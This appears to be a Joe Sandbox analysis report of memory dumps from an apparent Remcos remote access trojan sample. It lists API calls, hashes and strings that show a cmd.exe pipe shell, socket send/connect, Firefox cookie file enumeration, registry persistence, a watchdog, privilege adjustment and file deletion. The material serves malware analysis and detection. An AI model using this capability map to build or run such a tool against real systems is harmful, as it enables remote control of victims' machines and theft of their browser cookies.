                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                          • Opcode ID: 6e5e8e2758ca9d7dc12c922437e44a273a580d62e1ab66211850df98e2452fc7
                                                                                                                                                                                          • Instruction ID: 5c614e2fa5168a4e45addadbfe276c71d415ab97adf61a0b01644bf3b4fda2bb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e5e8e2758ca9d7dc12c922437e44a273a580d62e1ab66211850df98e2452fc7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 24E065379442256EDF2216655C2CB9B775D9B413B1F010225DC1596182DF2CD402E9E0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 123348B3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Startup
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                                                          • Opcode ID: ea5383319e0787fb25feb871811165c8455f71fa66e29a41c3246c4892c52212
                                                                                                                                                                                          • Instruction ID: e0041d8d1d769095c86484de1a4a9d9f445aff3ea5c223f152ee74aed81739cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea5383319e0787fb25feb871811165c8455f71fa66e29a41c3246c4892c52212
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD012735A862C5EF621A9B49C4F8E4775CC352615F000BAAECBAC36C2EA40171CC2B7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Deallocate.LIBCONCRT ref: 12332E2B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Deallocatestd::_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1323251999-0
                                                                                                                                                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                                          • Instruction ID: b99b25cc8ba40a518aa52ec276326e0acc421b75c2d468e1ddb2ff4fea5a4705
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
• Instruction Fuzzy Hash: 81B0923B4042007ACA536680AC42B5FB7A2ABA4B11F04C914BA9918161D2728728D602
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,12341DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 12341CB3
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 5f8fc32552f98c10d4aaf45c571837f49f6b6d58775d6784bd4be36191dceb83
• Instruction ID: d37f656d647a7ee444b81714c66f9eac2fb80986a19584f832f3ecad2d0f1fa1
• Opcode Fuzzy Hash: 5f8fc32552f98c10d4aaf45c571837f49f6b6d58775d6784bd4be36191dceb83
• Instruction Fuzzy Hash: 54B008B2458392AFCF02DF90CD4492EBAB6BBC8341F184D5CF2A64516087228428EB02
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: SG$ SG$8SG$8SG$PSG$dMG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
• API String ID: 3519838083-419171480
• Opcode ID: 199031d79b4a41a334a9cd24d8b34a5cd595dbc2da4f6ada28a0c3ca32364395
• Instruction ID: 2647dcded3d1af567f027b6f2d329f938d898989b9dfe75feb62994de44647dc
• Opcode Fuzzy Hash: 199031d79b4a41a334a9cd24d8b34a5cd595dbc2da4f6ada28a0c3ca32364395
• Instruction Fuzzy Hash: F0329260B443833BDF19B7705C5FF7E2E8ABBD1700F104429B5469B6D2EEA88D458366
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 123356E6
  • Part of subcall function 12334AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334B36
• __Init_thread_footer.LIBCMT ref: 12335723
• CreatePipe.KERNEL32(123A6CCC,123A6CB4,123A6BD8,00000000,123960BC,00000000), ref: 123357B6
• CreatePipe.KERNEL32(123A6CB8,123A6CD4,123A6BD8,00000000), ref: 123357CC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,123A6BE8,123A6CBC), ref: 1233583F
• Sleep.KERNEL32(0000012C,00000093,?), ref: 12335897
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 123358BC
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 123358E9
  • Part of subcall function 12364770: __onexit.LIBCMT ref: 12364776
• WriteFile.KERNEL32(00000000,00000000,?,00000000,123A4F90,123960C0,00000062,123960A4), ref: 123359E4
• Sleep.KERNEL32(00000064,00000062,123960A4), ref: 123359FE
• TerminateProcess.KERNEL32(00000000), ref: 12335A17
• CloseHandle.KERNEL32 ref: 12335A23
• CloseHandle.KERNEL32 ref: 12335A2B
• CloseHandle.KERNEL32 ref: 12335A3D
• CloseHandle.KERNEL32 ref: 12335A45
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: SystemDrive$cmd.exe
• API String ID: 2994406822-3633465311
• Opcode ID: f655cd7fa5f6816fcf8e35e60fd7257f561445eef2c7ae84019489914de031a2
• Instruction ID: f44b3312d455c8c5c402ac8cd5626737452cce00235c89a31556ca9c58c5738d
• Opcode Fuzzy Hash: f655cd7fa5f6816fcf8e35e60fd7257f561445eef2c7ae84019489914de031a2
• Instruction Fuzzy Hash: C69107BB584228AFDB52AB34DCD0A7E7BADEBC4301B40093DF549D6291DE21AE04DF51
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32 ref: 12342106
  • Part of subcall function 12343877: RegCreateKeyA.ADVAPI32(80000001,00000000,123960A4), ref: 12343885
  • Part of subcall function 12343877: RegSetValueExA.KERNEL32(123960A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,1233C152,12396C48,00000001,000000AF,123960A4), ref: 123438A0
  • Part of subcall function 12343877: RegCloseKey.ADVAPI32(123960A4,?,?,?,1233C152,12396C48,00000001,000000AF,123960A4), ref: 123438AB
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 12342146
• CloseHandle.KERNEL32(00000000), ref: 12342155
• CreateThread.KERNEL32(00000000,00000000,123427EE,00000000,00000000,00000000), ref: 123421AB
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 1234241A
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
• String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
• API String ID: 3018269243-13974260
• Opcode ID: 80846e9aa32d5e9ecad583fa24fef2e61b35c813560b9b1a2ed946de021dd459
• Instruction ID: caf8b4145597d1951c4f1e2719e8c994e397e7f075146ad6c9450c8f02044393
• Opcode Fuzzy Hash: 80846e9aa32d5e9ecad583fa24fef2e61b35c813560b9b1a2ed946de021dd459
• Instruction Fuzzy Hash: 3171923B6142405BD67AEB71CC549BE77F8AFD5301F500A6DF486A2190EF24BB09C7A2
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000000,Software\Mercury32,?), ref: 004012B3
• RegQueryValueA.ADVAPI32(?,BaseDir,?,?), ref: 004012DA
• RegCloseKey.ADVAPI32(?), ref: 004012E6
• RegCloseKey.ADVAPI32(?), ref: 004012F3
• FindFirstFileA.KERNEL32(?,?), ref: 0040133C
• FindClose.KERNEL32(00000000,?,?), ref: 00401347
• GetLocalTime.KERNEL32(?), ref: 00401392
Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: Close$Find$FileFirstLocalOpenQueryTimeValue
• String ID: %02d-%02d-%02d.%02d%02d: %s$%s\Loader.Log$BaseDir$Software\Mercury32$r+t
• API String ID: 3460814986-3360229980
• Opcode ID: d42e11aa60fbf32dd4a069eacb1d90151598f08982d27fe23f8b733977c3bb31
• Instruction ID: dfd861be5d27ab76580011db74593427ab2e3e9b6d1f87f4f499b649e2b96ce4
• Opcode Fuzzy Hash: d42e11aa60fbf32dd4a069eacb1d90151598f08982d27fe23f8b733977c3bb31
• Instruction Fuzzy Hash: C231A9B1D00218A6DB2197A1DC42FEE727C9B58704F1005BFBA45B11D2EBBC9B8497AC
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000000,?,?), ref: 0040163A
• RegQueryValueA.ADVAPI32(?,?,?,00000100), ref: 00401666
• RegCloseKey.ADVAPI32(?,?,?,?,00000100,80000000,?,?), ref: 0040167F
Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Sun
• API String ID: 3677997916-1777960983
• Opcode ID: 7ff23931f9180ebd065799e6ebba2e26a881ec2f15493c3a157dd0b93333aae2
• Instruction ID: a1372a7988ff15dddaec5151edecfe8a6d2af13598d18863dde0c3b66d26f21d
• Opcode Fuzzy Hash: 7ff23931f9180ebd065799e6ebba2e26a881ec2f15493c3a157dd0b93333aae2
• Instruction Fuzzy Hash: 2E618DB79002196AD755D761CC41EEBB37CEF48304F0445ABB649B2091EB785BD48FE8
Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 12343417
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 12343425
• GetFileSize.KERNEL32(?,00000000), ref: 12343432
• UnmapViewOfFile.KERNEL32(00000000), ref: 12343452
• CloseHandle.KERNEL32(00000000), ref: 1234345F
• CloseHandle.KERNEL32(?), ref: 12343465
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleView$CreateMappingSizeUnmap
• String ID:
• API String ID: 297527592-0
• Opcode ID: 6d2f60fa608976eb432555445adae6e36b4f98b6222c7cf6ec10d3f135070d4d
• Instruction ID: 1741bed1f8e5d04286adcb3823877cfacf3b6be66590ec1b5b850be7a463a1cd
• Opcode Fuzzy Hash: 6d2f60fa608976eb432555445adae6e36b4f98b6222c7cf6ec10d3f135070d4d
• Instruction Fuzzy Hash: 1E41C373248251BBD7219B65DC89F6B7AECEFC5768F300A19F658DA190EE30D500CA62
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
• Opcode ID: 401f5f3d2bfbf4705654e8bf53b8f20f95d9d126d85cd321d15299b92ac01670
• Instruction ID: 59483818b5f760f7e2e3d04f538446bdc99ca28c0bc00dae34ebd6b4643a217a
• Opcode Fuzzy Hash: 401f5f3d2bfbf4705654e8bf53b8f20f95d9d126d85cd321d15299b92ac01670
• Instruction Fuzzy Hash: 8671D1769483429FD725CF20E854BAABBD49F88310F104A5DF592572E0DF74BB09C792
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,123A58E8), ref: 1234A75E
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 1234A7AD
• GetLastError.KERNEL32 ref: 1234A7BB
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 1234A7F3
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
• Opcode ID: d601eb24ad070c104b7f5b59712a0ed285fe31f546d31787d81b132d7a071b59
• Instruction ID: 021211ebcfe7c1384cb7d46c870f97f03e111b20688962dd009977c4363d59db
• Opcode Fuzzy Hash: d601eb24ad070c104b7f5b59712a0ed285fe31f546d31787d81b132d7a071b59
• Instruction Fuzzy Hash: 1B813976508344ABC366DB60C8949AFB7ECFF94305F504A1EF58696250EF34BB09CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 1233C39B
• FindNextFileW.KERNEL32(00000000,?), ref: 1233C46E
• FindClose.KERNEL32(00000000), ref: 1233C47D
• FindClose.KERNEL32(00000000), ref: 1233C4A8
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 1164774033-405221262
• Opcode ID: ca2aed4c5c61f779917124222abfc8545091ed4c566a9830fdf2c145cc8bf5b7
• Instruction ID: 132cb4dd459a79dd594a354501db79298f42dd2c0d49f9079f6b20a458fb2cde
• Opcode Fuzzy Hash: ca2aed4c5c61f779917124222abfc8545091ed4c566a9830fdf2c145cc8bf5b7
• Instruction Fuzzy Hash: D23184379442196ADB66E7B0DC98DFD777CAF51712F004619E00AA2180EF34AB4ACB44
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C2EC
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C31C
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C38E
• DeleteFileW.KERNEL32(?,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C39B
  • Part of subcall function 1234C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C371
• GetLastError.KERNEL32(?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C3BC
• FindClose.KERNEL32(00000000,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C3D2
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C3D9
• FindClose.KERNEL32(00000000,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C3E2
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
• Opcode ID: b5e84df84747b4cb0ef23989db8eabd920382d80f099c36830e3839410ea0c3a
• Instruction ID: 75d77fd3a9efb1ae3a8786363304ab31af59e837517fc8ae3c7f115549e8414c
• Opcode Fuzzy Hash: b5e84df84747b4cb0ef23989db8eabd920382d80f099c36830e3839410ea0c3a
• Instruction Fuzzy Hash: E031A57790026C5BDB20DAA0CC88EEB73FCAF44208F600AE5E559E2141EF35EB84CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 12339258
  • Part of subcall function 123348C8: connect.WS2_32(FFFFFFFF,124892B8,00000010), ref: 123348E0
  • Part of subcall function 12334AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334B36
• __CxxThrowException@8.LIBVCRUNTIME ref: 123392F4
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 12339352
• FindNextFileW.KERNEL32(00000000,?), ref: 123393AA
• FindClose.KERNEL32(00000000), ref: 123393C1
  • Part of subcall function 12334E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,123A4EF8,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E38
  • Part of subcall function 12334E26: SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E43
  • Part of subcall function 12334E26: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E4C
• FindClose.KERNEL32(00000000), ref: 123395B9
  • Part of subcall function 12334AA1: WaitForSingleObject.KERNEL32(00000000,00000000,1233547D,?,?,00000004,?,?,00000004,?,123A4EF8,?), ref: 12334B47
  • Part of subcall function 12334AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,123A4EF8,?,?,?,?,?,?,1233547D), ref: 12334B75
Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2435342581-0
                                                                                                                                                                                          • Opcode ID: 5d3b9b36eab660c66e910d58e15e83cfa1c9a532d08c2f9533922f02b5c6a4e4
                                                                                                                                                                                          • Instruction ID: 5048a4a49422a16a7020710881e21b3bec16346f301fe5bfcf30178c92ed150f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d3b9b36eab660c66e910d58e15e83cfa1c9a532d08c2f9533922f02b5c6a4e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B17D779001199BDB66EBA0DC91EFDB779AF04312F104259E50AA7194EF30BF49CB90
                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 12347952: GetCurrentProcess.KERNEL32(00000028,?), ref: 1234795F
  • Part of subcall function 12347952: OpenProcessToken.ADVAPI32(00000000), ref: 12347966
  • Part of subcall function 12347952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 12347978
  • Part of subcall function 12347952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 12347997
  • Part of subcall function 12347952: GetLastError.KERNEL32 ref: 1234799D
• ExitWindowsEx.USER32(00000000,00000001), ref: 12346856
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 1234686B
• GetProcAddress.KERNEL32(00000000), ref: 12346872
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: PowrProf.dll$SetSuspendState
• API String ID: 1589313981-1420736420
• Opcode ID: 0ed498153ba48b2de706069ac15bd8f5fee963728e51322e90729d17ffc79115
• Instruction ID: ba2866dd8b4eb1f2d4f20783c9fab8d367ee2e91878c028fc8a75eea8f08bb17
• Opcode Fuzzy Hash: 0ed498153ba48b2de706069ac15bd8f5fee963728e51322e90729d17ffc79115
• Instruction Fuzzy Hash: 4E21B6BB6143459FCEA6EFB0CC94ABE23EE5F41B41F400C58A081971C1EE65AA05CF61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 1233966A
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 123396E2
• FindNextFileW.KERNEL32(00000000,?), ref: 1233970B
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 12339722
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: c31f7233d6e1fd9e281532df9908bceae4bcfbfd7913f71989f785548abc573d
• Instruction ID: 7aaf324911104d3e3dc94779c5cea0805b8d614938c15b1e043c6328a045ed05
• Opcode Fuzzy Hash: c31f7233d6e1fd9e281532df9908bceae4bcfbfd7913f71989f785548abc573d
• Instruction Fuzzy Hash: A7811977800119DBCB66DBA0DC909FDB7B8BF14316F10466AE446A71A0EF34AB49CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 12378215: GetLastError.KERNEL32(00000020,?,1236A7F5,?,?,?,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B), ref: 12378219
  • Part of subcall function 12378215: _free.LIBCMT ref: 1237824C
  • Part of subcall function 12378215: SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 1237828D
  • Part of subcall function 12378215: _abort.LIBCMT ref: 12378293
  • Part of subcall function 12378215: _free.LIBCMT ref: 12378274
  • Part of subcall function 12378215: SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 12378281
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 1238271C
• IsValidCodePage.KERNEL32(00000000), ref: 12382777
• IsValidLocale.KERNEL32(?,00000001), ref: 12382786
• GetLocaleInfoW.KERNEL32(?,00001001,12374A6C,00000040,?,12374B8C,00000055,00000000,?,?,00000055,00000000), ref: 123827CE
• GetLocaleInfoW.KERNEL32(?,00001002,12374AEC,00000040), ref: 123827ED
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID:
• API String ID: 745075371-0
• Opcode ID: 3eb1958f35ce890f68ff7277d1eb0fdcb824e3b362a248c121e1a2b5a7bdb3d9
• Instruction ID: f6582d83a222f21d24fd63777f280ad3a7a7b0e21e11e3a7fdc468ed8f3b9210
• Opcode Fuzzy Hash: 3eb1958f35ce890f68ff7277d1eb0fdcb824e3b362a248c121e1a2b5a7bdb3d9
• Instruction Fuzzy Hash: 35517E77900259ABEF10DBA5CC84EFAB7B8AF58700F414769E954EF191E770AA00CB61
Uniqueness

Uniqueness Score: -1.00%

